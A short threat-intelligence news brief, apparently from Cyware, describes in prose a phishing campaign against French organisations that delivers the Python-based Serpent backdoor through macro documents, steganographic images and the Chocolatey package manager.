A new email campaign attacking French entities is using a highly evasive attack chain. The phishing campaign is installing a new backdoor named Serpent. 

Diving into details

An unknown and likely sophisticated threat actor is leveraging a unique amalgamation of open-source software, a detection bypass technique, and steganography to attack French government agencies, large construction firms, and real estate companies. The bad actor is exploiting a popular Windows package manager, dubbed Chocolatey, which installs Serpent. 

Attack chain

  • The phishing email impersonates the EU’s GDPR. The email contains a macro-laced Microsoft Word document.
  • Once opened and enabled, the malicious macro fetches an image of the Swiper Fox from Dora the Explorer. 
  • The images leverage steganography to hide a PowerShell script that is executed by the macros. The steganography image hides the malicious code to evade detection.
  • Another steganographic image is downloaded to deploy the Python-based Serpent backdoor. 

Why this matters

Although the ultimate goal of the campaign has not been discerned yet, successful infection allows the threat actor to perform various actions. Serpent communicates with the attacker’s C2 server to receive commands that will be executed on the victim device. It is capable of executing any command, enabling the hackers to download more malware, gain full access to the infected device, and open reverse shells. 

New threat actor?

Apart from exploiting Chocolatey and installing Serpent, the attackers are executing signed binary proxy using schtrasks.exe, a new bypassing technique. All these unique tactics and techniques indicate that the attackers belong to a new, advanced group with high capabilities. Moreover, it is not connected to any other known gang. 

The bottom line

The TTPs of the threat actor point toward espionage, with host control, data access, and installation of further malware as the primary objectives. Furthermore, Chocolatey has stated that it is unaware of its software being abused and is looking into it. The techniques described above are unique and hence, organizations are advised to beware and implement top-notch security measures. 

Cyware Publisher

Publisher

Cyware